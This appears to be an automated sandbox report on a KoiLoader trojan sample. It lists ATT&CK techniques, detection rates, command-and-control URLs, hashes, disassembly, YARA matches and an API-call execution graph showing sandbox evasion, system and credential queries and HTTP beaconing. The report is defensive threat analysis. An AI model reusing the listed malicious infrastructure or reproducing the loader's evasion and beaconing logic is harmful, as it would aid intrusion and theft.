                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
                    Process Injection
                    1
                    Access Token Manipulation
                    LSASS Memory231
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable Media1
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading
                    11
                    Process Injection
                    Security Account Manager21
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared Drive1
                    Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    Bypass User Account Control
                    1
                    Deobfuscate/Decode Files or Information
                    NTDS1
                    Account Discovery
                    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                    Obfuscated Files or Information
                    LSA Secrets1
                    System Owner/User Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading
                    Cached Domain Credentials1
                    File and Directory Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Bypass User Account Control
                    DCSync112
                    System Information Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    JT1yqn67un.exe71%ReversingLabsWin32.Trojan.Koiloader
                    JT1yqn67un.exe58%VirustotalBrowse
                    JT1yqn67un.exe100%AviraHEUR/AGEN.1317648
                    JT1yqn67un.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://2.58.14.95/malto.php%temp%0%VirustotalBrowse
                    http://2.58.14.95/malto.php0%VirustotalBrowse
                    https://lacasadelverde.com/css0%VirustotalBrowse
                    https://lacasadelverde.com/css/c0%VirustotalBrowse
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    http://2.58.14.95/malto.phptrueunknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://lacasadelverde.com/css/cJT1yqn67un.exe, 00000000.00000002.1735347599.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, JT1yqn67un.exe, 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmpfalseunknown
                    https://lacasadelverde.com/cssJT1yqn67un.exetrueunknown
                    http://2.58.14.95/malto.php%temp%JT1yqn67un.exe, 00000000.00000002.1735347599.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, JT1yqn67un.exe, 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmpfalseunknown
                    No contacted IP infos
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1528834
                    Start date and time:2024-10-08 10:34:22 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 1m 50s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:1
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:JT1yqn67un.exe
                    renamed because original name is a hash value
                    Original Sample Name:9e88e85a46486f7f56b3aaba6e29737c.exe
                    Detection:MAL
                    Classification:mal100.bank.troj.expl.evad.winEXE@1/0@0/0
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 97%
                    • Number of executed functions: 5
                    • Number of non-executed functions: 61
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Stop behavior analysis, all processes terminated
                    No simulations
                    No context
                    No context
                    No context
                    No context
                    No context
                    No created / dropped files found
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):5.892192819985257
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:JT1yqn67un.exe
                    File size:194'048 bytes
                    MD5:9e88e85a46486f7f56b3aaba6e29737c
                    SHA1:c33d28a63c240f4677b185e7cbc918da3d4f49ec
                    SHA256:deb72a5ebd26b40dc1847314d896b4e768f6f14d95fcfcbf1046c65518df5883
                    SHA512:a33576d07b4aba69b4aad6e7edd797b9cb1af48ff03261d0b66a61dd1f410dd57736b7e7797d790807eca7c779d6381a680542646a46c4437d1b48ce8a0c467e
                    SSDEEP:3072:QA+MPNsjU+g/Pu92PkWMW50y4jrv34ClUCe33ghzk3Jc1333333333333M/Ncw3m:XJPxktlK33ghzk3Jc1333333333333sY
                    TLSH:84146A7239C9C538D0336C3686A9359D1D3CF7D98F517CFB13640B0B4AA65818BB2EA6
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oaN`+. 3+. 3+. 3`x#2!. 3`x%2.. 3`x$2?. 3..$29. 3..#2?. 3..%2.. 3`x!2,. 3+.!3A. 3..)2*. 3...3*. 3+..3*. 3.."2*. 3Rich+. 3.......
                    Icon Hash:90cececece8e8eb0
                    Entrypoint:0x4049b4
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66CDD42B [Tue Aug 27 13:27:07 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:0
                    File Version Major:6
                    File Version Minor:0
                    Subsystem Version Major:6
                    Subsystem Version Minor:0
                    Import Hash:66deda4204cb009d8c01c3f28c17567f
                    Instruction
                    call 00007EFFC8C7D269h
                    jmp 00007EFFC8C7CCDFh
                    push ebp
                    mov ebp, esp
                    push 00000000h
                    call dword ptr [0041305Ch]
                    push dword ptr [ebp+08h]
                    call dword ptr [00413058h]
                    push C0000409h
                    call dword ptr [0041300Ch]
                    push eax
                    call dword ptr [00413014h]
                    pop ebp
                    ret
                    push ebp
                    mov ebp, esp
                    sub esp, 00000324h
                    push 00000017h
                    call dword ptr [00413060h]
                    test eax, eax
                    je 00007EFFC8C7CE67h
                    push 00000002h
                    pop ecx
                    int 29h
                    mov dword ptr [0041BAB8h], eax
                    mov dword ptr [0041BAB4h], ecx
                    mov dword ptr [0041BAB0h], edx
                    mov dword ptr [0041BAACh], ebx
                    mov dword ptr [0041BAA8h], esi
                    mov dword ptr [0041BAA4h], edi
                    mov word ptr [0041BAD0h], ss
                    mov word ptr [0041BAC4h], cs
                    mov word ptr [0041BAA0h], ds
                    mov word ptr [0041BA9Ch], es
                    mov word ptr [0041BA98h], fs
                    mov word ptr [0041BA94h], gs
                    pushfd
                    pop dword ptr [0041BAC8h]
                    mov eax, dword ptr [ebp+00h]
                    mov dword ptr [0041BABCh], eax
                    mov eax, dword ptr [ebp+04h]
                    mov dword ptr [0041BAC0h], eax
                    lea eax, dword ptr [ebp+08h]
                    mov dword ptr [0041BACCh], eax
                    mov eax, dword ptr [ebp-00000324h]
                    mov dword ptr [0041BA08h], 00010001h
                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x19c900x3c.rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d0000x14c20.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x320000x1248.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x18ac00x38.rdata
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x18a000x40.rdata
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x130000x120.rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x110f80x11200f74d11cfe8e6d8e71072a0f11d9c7e99False0.5522496578467153data6.540620762088607IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rdata0x130000x730c0x740043bad7cdc02fea52ffa73e87a7e3367cFalse0.44396551724137934OpenPGP Public Key4.906263467320942IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0x1b0000x168c0xa0005e197c695a0d6994051ad539ab3ce55False0.176953125data2.3864029716696016IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0x1d0000x14c200x14e00203e1bbc3958c8917244511c60004552False0.5135666167664671data4.900628725869767IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .reloc0x320000x12480x140076ad3658e65dc48ccae7781fa560593eFalse0.7134765625data6.282640625763616IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_DIALOG0x1d1180x168dataEnglishUnited States0.6333333333333333
                    RT_RCDATA0x1d2800x1ddataEnglishUnited States1.3103448275862069
                    RT_RCDATA0x1d2a00x14800dataEnglishUnited States0.5153272675304879
                    RT_MANIFEST0x31aa00x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                    DLLImport
                    KERNEL32.dllVirtualFree, GetCurrentProcess, VirtualAlloc, TerminateProcess, GetModuleHandleA, GetLastError, GetProcAddress, ExitProcess, VirtualProtect, BuildCommDCBAndTimeoutsA, WriteConsoleW, CloseHandle, CreateFileW, SetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, FlushFileBuffers, HeapReAlloc, HeapSize, GetModuleHandleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, GetModuleHandleExW, HeapFree, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, LCMapStringW, GetProcessHeap, DecodePointer
                    GDI32.dllLPtoDP
                    Language of compilation systemCountry where language is spokenMap
                    EnglishUnited States
                    No network behavior found

                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Target ID:0
                    Start time:04:35:19
                    Start date:08/10/2024
                    Path:C:\Users\user\Desktop\JT1yqn67un.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\JT1yqn67un.exe"
                    Imagebase:0xf00000
                    File size:194'048 bytes
                    MD5 hash:9E88E85A46486F7F56B3AABA6E29737C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_KoiLoader_1, Description: Yara detected KoiLoader, Source: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_KoiLoader_1, Description: Yara detected KoiLoader, Source: 00000000.00000002.1735347599.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1735347599.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    Reset < >

                      Execution Graph

                      Execution Coverage:8.7%
                      Dynamic/Decrypted Code Coverage:18.1%
                      Signature Coverage:14.7%
                      Total number of Nodes:1384
                      Total number of Limit Nodes:9
                      execution_graph 13001 5e9250 GetUserDefaultLangID 13002 5e92fc ExitProcess 13001->13002 13003 5e926d 13001->13003 13003->13002 13017 5e89f0 13003->13017 13005 5e92da 13005->13002 13006 5e92de 13005->13006 13102 5e8710 InitializeCriticalSection 13006->13102 13008 5e92e3 13112 5e72e0 13008->13112 13016 5e92f7 13016->13002 13018 5e89fd 13017->13018 13019 5e8a12 EnumDisplayDevicesW 13018->13019 13020 5e8aaa GetModuleHandleA GetProcAddress GetProcAddress 13019->13020 13021 5e8a3a 13019->13021 13023 5e8ae6 ExpandEnvironmentStringsW ExpandEnvironmentStringsW GetFileAttributesW 13020->13023 13024 5e8ae0 13020->13024 13022 5e8a40 StrStrIW 13021->13022 13025 5e8a57 StrStrIW 13022->13025 13026 5e8b45 13022->13026 13027 5e8b4e SHGetFolderPathW SHGetFolderPathW PathCombineW GetFileAttributesW 13023->13027 13028 5e8b26 13023->13028 13024->13023 13025->13026 13030 5e8a6d StrStrIW 13025->13030 13026->13005 13037 5e8ba6 13027->13037 13028->13027 13031 5e8b2a GetFileAttributesW 13028->13031 13030->13026 13032 5e8a83 StrStrIW 13030->13032 13031->13027 13033 5e8b38 13031->13033 13032->13026 13034 5e8a99 EnumDisplayDevicesW 13032->13034 13033->13027 13036 5e8b3c 13033->13036 13034->13020 13034->13022 13035 5e8bd5 PathCombineW GetFileAttributesW 13035->13037 13036->13026 13037->13026 13037->13035 13038 5e8c19 13037->13038 13038->13026 13039 5e8c28 PathCombineW PathCombineW GetFileAttributesW 13038->13039 13040 5e8dee PathCombineW GetFileAttributesW 13039->13040 13041 5e8c70 13039->13041 13043 5e8ed9 ExpandEnvironmentStringsW GetFileAttributesW 13040->13043 13044 5e8e19 13040->13044 13041->13040 13042 5e8c78 GetFileAttributesW 13041->13042 13042->13040 13045 5e8c8a 13042->13045 13047 5e8efe 13043->13047 13044->13043 13046 5e8e21 CreateFileW 13044->13046 13045->13040 13048 5e8c92 CreateFileW 13045->13048 13049 5e8e4f GetFileSize GetProcessHeap HeapAlloc 13046->13049 13050 5e8e92 13046->13050 13053 5e8f0c GetFileAttributesExW 13047->13053 13054 5e8f2d GetComputerNameW GetUserNameW KiUserCallbackDispatcher GetSystemMetrics 13047->13054 13051 5e8d0e CreateFileW 13048->13051 13052 5e8ccd GetFileSize GetProcessHeap HeapAlloc 13048->13052 13055 5e8e89 CloseHandle 13049->13055 13056 5e8e70 ReadFile 13049->13056 13057 5e8e9c lstrcmpA 13050->13057 13058 5e8ebb 13050->13058 13063 5e8d78 13051->13063 13064 5e8d35 GetFileSize GetProcessHeap HeapAlloc 13051->13064 13059 5e8d07 CloseHandle 13052->13059 13060 5e8cf0 ReadFile 13052->13060 13053->13054 13061 5e8f23 13053->13061 13062 5e8fb0 lstrcmpW 13054->13062 13055->13050 13056->13055 13057->13058 13065 5e8ecf 13058->13065 13066 5e8ebf GetProcessHeap HeapFree 13058->13066 13059->13051 13060->13059 13061->13026 13061->13054 13062->13026 13067 5e8fc8 13062->13067 13070 5e8db9 13063->13070 13072 5e8d88 lstrcmpA 13063->13072 13068 5e8d6f CloseHandle 13064->13068 13069 5e8d56 ReadFile 13064->13069 13065->13026 13065->13043 13066->13065 13067->13062 13071 5e8fcf StrStrW 13067->13071 13068->13063 13069->13068 13073 5e8dd0 13070->13073 13074 5e8dc0 GetProcessHeap HeapFree 13070->13074 13071->13026 13077 5e8fe9 lstrcmpW 13071->13077 13072->13070 13078 5e8d9a lstrcmpA 13072->13078 13075 5e8de4 13073->13075 13076 5e8dd4 GetProcessHeap HeapFree 13073->13076 13074->13073 13075->13026 13075->13040 13076->13075 13079 5e900e 13077->13079 13080 5e8ffb lstrcmpW 13077->13080 13078->13070 13081 5e9025 lstrcmpW 13079->13081 13082 5e9041 GlobalMemoryStatusEx 13079->13082 13080->13026 13080->13079 13081->13026 13081->13079 13082->13026 13083 5e9074 lstrcmpW 13082->13083 13084 5e9086 lstrcmpW 13083->13084 13085 5e9095 13083->13085 13084->13085 13085->13026 13086 5e90e5 PathCombineW 13085->13086 13088 5e90bb lstrcmpW 13085->13088 13087 5e9100 13086->13087 13087->13087 13089 5e9110 FindFirstFileW 13087->13089 13088->13086 13090 5e90cd 13088->13090 13091 5e9222 GetModuleFileNameW StrStrIW 13089->13091 13092 5e9130 13089->13092 13090->13026 13090->13086 13091->13005 13093 5e9140 lstrcmpW 13092->13093 13094 5e9156 lstrcmpW 13093->13094 13095 5e91f4 FindNextFileW 13093->13095 13094->13095 13100 5e916c 13094->13100 13095->13093 13096 5e920a FindClose 13095->13096 13096->13026 13096->13091 13097 5e9197 lstrcmpW 13098 5e91ab lstrcmpW 13097->13098 13097->13100 13099 5e91b7 lstrcmpW 13098->13099 13098->13100 13099->13100 13101 5e91c3 lstrcmpW 13099->13101 13100->13095 13100->13097 13101->13100 13180 5e71a0 13102->13180 13105 5e87ff 13188 5e26a0 GetTickCount 13105->13188 13106 5e88f1 ExitProcess 13108 5e8804 WSAStartup CryptAcquireContextA 13109 5e884f CryptAcquireContextA 13108->13109 13110 5e886f CoInitializeEx ExpandEnvironmentStringsW CreateFileW 13108->13110 13109->13106 13109->13110 13110->13008 13190 5e9750 13112->13190 13115 5e733f GetSystemWow64DirectoryW 13117 5e735b wnsprintfW ExpandEnvironmentStringsW wnsprintfW 13115->13117 13118 5e7355 GetLastError 13115->13118 13116 5e732c ExpandEnvironmentStringsW 13116->13115 13192 5e6d50 VariantInit CoCreateInstance 13117->13192 13118->13117 13121 5e7419 NetApiBufferFree 13122 5e74f1 13121->13122 13123 5e742f 13121->13123 13130 5e93b0 CryptGenRandom 13122->13130 13228 5e94b0 8 API calls 13123->13228 13126 5e745c wsprintfW CoGetObject 13127 5e74b3 13126->13127 13127->13122 13129 5e74eb CoUninitialize 13127->13129 13129->13122 13131 5e93ec 13130->13131 13243 5e2840 GetProcessHeap HeapAlloc 13131->13243 13134 5e942e 13136 5e2840 2 API calls 13134->13136 13135 5e9422 GetProcessHeap HeapFree 13135->13134 13137 5e943d 13136->13137 13138 5e9446 wsprintfA 13137->13138 13139 5e92ed 13137->13139 13140 5e9471 13138->13140 13143 5e7920 GetPEB LsaOpenPolicy 13139->13143 13142 5e948f GetProcessHeap HeapFree GetProcessHeap HeapFree 13140->13142 13245 5e6830 ObtainUserAgentString MultiByteToWideChar 13140->13245 13142->13139 13144 5e796c LsaQueryInformationPolicy 13143->13144 13145 5e79ea GetComputerNameW GetUserNameW WideCharToMultiByte 13143->13145 13148 5e797f 13144->13148 13149 5e79e1 LsaClose 13144->13149 13146 5e7a3b 13145->13146 13147 5e7a44 GetProcessHeap HeapAlloc 13145->13147 13150 5e7a7f WideCharToMultiByte 13146->13150 13147->13146 13151 5e7a5a WideCharToMultiByte 13147->13151 13152 5e79da LsaFreeMemory 13148->13152 13153 5e7987 GetProcessHeap HeapAlloc 13148->13153 13149->13145 13154 5e7aa9 GetProcessHeap HeapAlloc 13150->13154 13158 5e7aa0 13150->13158 13151->13150 13152->13149 13156 5e79a0 13153->13156 13155 5e7abd WideCharToMultiByte 13154->13155 13154->13158 13155->13158 13156->13152 13157 5e26a0 GetTickCount 13157->13158 13158->13157 13159 5e7b2a 13158->13159 13160 5e7b39 wsprintfA wsprintfA 13159->13160 13161 5e7b8e 13160->13161 13162 5e6830 32 API calls 13161->13162 13163 5e7bc4 13162->13163 13164 5e7bdf 13163->13164 13165 5e7bd7 GetProcessHeap HeapFree 13163->13165 13166 5e7bee 13164->13166 13167 5e7be6 GetProcessHeap HeapFree 13164->13167 13165->13164 13168 5e7bfd 13166->13168 13169 5e7bf5 GetProcessHeap HeapFree 13166->13169 13167->13166 13170 5e7c09 13168->13170 13171 5e7c01 GetProcessHeap HeapFree 13168->13171 13169->13168 13172 5e8900 ExpandEnvironmentStringsW ExpandEnvironmentStringsW ExpandEnvironmentStringsW 13170->13172 13171->13170 13173 5e8950 13172->13173 13173->13173 13174 5e8960 GetFileAttributesW 13173->13174 13175 5e897f GetFileAttributesW 13174->13175 13176 5e8974 13174->13176 13177 5e8978 13175->13177 13178 5e89a3 wnsprintfW ShellExecuteW 13175->13178 13176->13175 13176->13177 13177->13178 13179 5e8996 lstrcpyW 13177->13179 13178->13016 13179->13178 13181 5e71b1 RegOpenKeyExW 13180->13181 13182 5e71d4 RegQueryValueExW 13181->13182 13185 5e722f 13181->13185 13183 5e7226 RegCloseKey 13182->13183 13184 5e71f0 GetProcessHeap HeapAlloc 13182->13184 13183->13185 13184->13183 13186 5e720c RegQueryValueExW 13184->13186 13185->13181 13187 5e7246 GetVolumeInformationW StringFromGUID2 wsprintfA CreateMutexW GetLastError 13185->13187 13186->13183 13187->13105 13187->13106 13189 5e26b0 13188->13189 13189->13108 13189->13189 13191 5e72ed ExpandEnvironmentStringsW ExpandEnvironmentStringsW lstrlenW 13190->13191 13191->13115 13191->13116 13193 5e6dab 13192->13193 13199 5e6dfa 13192->13199 13196 5e6ddc SysAllocString 13193->13196 13193->13199 13194 5e6e1d SysFreeString 13195 5e6e20 13194->13195 13197 5e7168 SetFileAttributesW lstrcpyW GetUserNameW NetUserGetInfo 13195->13197 13198 5e6e2a SysAllocString 13195->13198 13196->13199 13197->13121 13197->13122 13200 5e6e4d SysFreeString 13198->13200 13199->13194 13199->13195 13201 5e6e7d 13200->13201 13202 5e6e5d SysAllocString 13200->13202 13203 5e6e81 SysAllocString 13201->13203 13206 5e6e99 13201->13206 13204 5e6e74 SysFreeString 13202->13204 13205 5e6e96 SysFreeString 13203->13205 13204->13201 13205->13206 13206->13197 13207 5e6ecf SysAllocString 13206->13207 13210 5e6f07 13206->13210 13208 5e6ee2 SysFreeString SysAllocString 13207->13208 13209 5e6ef8 SysFreeString 13208->13209 13209->13210 13211 5e6f6b 13210->13211 13212 5e6f49 SysAllocString 13210->13212 13215 5e6fca SysAllocString 13211->13215 13218 5e702d 13211->13218 13213 5e6f5c SysFreeString 13212->13213 13213->13211 13214 5e70cd 13214->13197 13216 5e70f6 VariantInit SysAllocString SysAllocString 13214->13216 13217 5e6fdd SysFreeString SysAllocString 13215->13217 13219 5e7158 SysFreeString VariantClear 13216->13219 13220 5e6ff3 SysFreeString 13217->13220 13218->13214 13221 5e709e SysAllocString 13218->13221 13219->13197 13222 5e700a 13220->13222 13223 5e70b1 SysFreeString 13221->13223 13222->13218 13224 5e700e SysAllocString 13222->13224 13223->13214 13225 5e70bb SysAllocString 13223->13225 13226 5e7021 SysFreeString 13224->13226 13227 5e70ca SysFreeString 13225->13227 13226->13218 13227->13214 13229 5e951d 13228->13229 13242 5e7434 CoInitializeEx lstrlenW 13228->13242 13230 5e9539 GetCurrentProcessId OpenProcess 13229->13230 13229->13242 13231 5e9558 ReadProcessMemory 13230->13231 13230->13242 13233 5e9582 ReadProcessMemory 13231->13233 13231->13242 13234 5e959c GetWindowsDirectoryW StrNCatW VirtualAlloc lstrcpyW 13233->13234 13233->13242 13235 5e95f3 GetModuleFileNameW 13234->13235 13237 5e9640 ReadProcessMemory 13235->13237 13238 5e9657 ReadProcessMemory 13237->13238 13237->13242 13239 5e9672 13238->13239 13238->13242 13239->13237 13240 5e9689 CloseHandle StrCmpIW 13239->13240 13240->13242 13242->13126 13242->13127 13244 5e287c 13243->13244 13244->13134 13244->13135 13246 5e687a 13245->13246 13247 5e6881 GetProcessHeap HeapAlloc 13245->13247 13274 5e6670 13246->13274 13247->13246 13248 5e689f MultiByteToWideChar 13247->13248 13248->13246 13250 5e68c8 13251 5e68ca InternetOpenW 13250->13251 13252 5e6906 InternetSetOptionW 13250->13252 13253 5e6a76 13250->13253 13251->13250 13252->13252 13254 5e691d InternetConnectW 13252->13254 13255 5e6a89 GetProcessHeap HeapFree 13253->13255 13256 5e6a91 13253->13256 13259 5e6a58 InternetCloseHandle 13254->13259 13260 5e6941 HttpOpenRequestW 13254->13260 13255->13256 13257 5e6a98 GetProcessHeap HeapFree 13256->13257 13258 5e6aa0 13256->13258 13257->13258 13261 5e6aaf 13258->13261 13262 5e6aa7 GetProcessHeap HeapFree 13258->13262 13259->13250 13259->13253 13263 5e6a4c 13260->13263 13264 5e6977 InternetQueryOptionW 13260->13264 13261->13140 13262->13261 13265 5e6a52 InternetCloseHandle 13263->13265 13266 5e699a InternetSetOptionW 13264->13266 13267 5e69b0 HttpSendRequestW 13264->13267 13265->13259 13266->13267 13268 5e6a41 InternetCloseHandle 13267->13268 13272 5e69c8 13267->13272 13268->13265 13269 5e69d0 InternetQueryDataAvailable 13269->13272 13270 5e6a08 GetProcessHeap HeapReAlloc 13273 5e6a18 InternetReadFile 13270->13273 13271 5e69f7 GetProcessHeap HeapAlloc 13271->13273 13272->13268 13272->13269 13272->13270 13272->13271 13273->13272 13275 5e6680 InternetCrackUrlW 13274->13275 13277 5e66e3 GetProcessHeap HeapAlloc 13275->13277 13280 5e677e 13275->13280 13279 5e670c GetProcessHeap HeapAlloc 13277->13279 13277->13280 13279->13280 13280->13250 11613 f04838 11614 f04844 ___scrt_is_nonwritable_in_current_image 11613->11614 11639 f04b95 11614->11639 11616 f0484b 11617 f0499e 11616->11617 11627 f04875 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 11616->11627 11680 f04e89 IsProcessorFeaturePresent 11617->11680 11619 f049a5 11684 f084d4 11619->11684 11624 f04894 11625 f04915 11647 f04f9e 11625->11647 11627->11624 11627->11625 11663 f084ae 11627->11663 11628 f0491b 11651 f03c30 11628->11651 11634 f0493b 11635 f04944 11634->11635 11671 f08489 11634->11671 11674 f04d06 11635->11674 11640 f04b9e 11639->11640 11690 f05125 IsProcessorFeaturePresent 11640->11690 11644 f04baf 11646 f04bb3 11644->11646 11700 f05b1d 11644->11700 11646->11616 11760 f05b70 11647->11760 11649 f04fb1 GetStartupInfoW 11650 f04fc4 11649->11650 11650->11628 11762 f03670 11651->11762 11654 f03c76 ExitProcess 11655 f03c6b GetLastError 11655->11654 11656 f03c7e BuildCommDCBAndTimeoutsA 11655->11656 11657 f03ca0 11656->11657 11658 f03c91 GetCurrentProcess TerminateProcess 11656->11658 11851 f01710 11657->11851 11658->11657 11662 f03cb1 11669 f04fd4 GetModuleHandleW 11662->11669 11664 f084c4 ___scrt_is_nonwritable_in_current_image _unexpected 11663->11664 11664->11625 12393 f090ba GetLastError 11664->12393 11670 f04937 11669->11670 11670->11619 11670->11634 12782 f08308 11671->12782 11675 f04d12 11674->11675 11676 f0494c 11675->11676 12853 f08ab4 11675->12853 11676->11624 11678 f04d20 11679 f05b1d ___scrt_uninitialize_crt 7 API calls 11678->11679 11679->11676 11681 f04e9f CallUnexpected 11680->11681 11682 f04f4a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11681->11682 11683 f04f8e CallUnexpected 11682->11683 11683->11619 11685 f08308 CallUnexpected 21 API calls 11684->11685 11686 f049ab 11685->11686 11687 f08498 11686->11687 11688 f08308 CallUnexpected 21 API calls 11687->11688 11689 f049b3 11688->11689 11691 f04baa 11690->11691 11692 f05afe 11691->11692 11706 f06d07 11692->11706 11695 f05b07 11695->11644 11697 f05b0f 11698 f05b1a 11697->11698 11720 f06d43 11697->11720 11698->11644 11701 f05b30 11700->11701 11702 f05b26 11700->11702 11701->11646 11703 f05db9 ___vcrt_uninitialize_ptd 6 API calls 11702->11703 11704 f05b2b 11703->11704 11705 f06d43 ___vcrt_uninitialize_locks DeleteCriticalSection 11704->11705 11705->11701 11707 f06d10 11706->11707 11709 f06d39 11707->11709 11711 f05b03 11707->11711 11724 f06f4c 11707->11724 11710 f06d43 ___vcrt_uninitialize_locks DeleteCriticalSection 11709->11710 11710->11711 11711->11695 11712 f05d86 11711->11712 11741 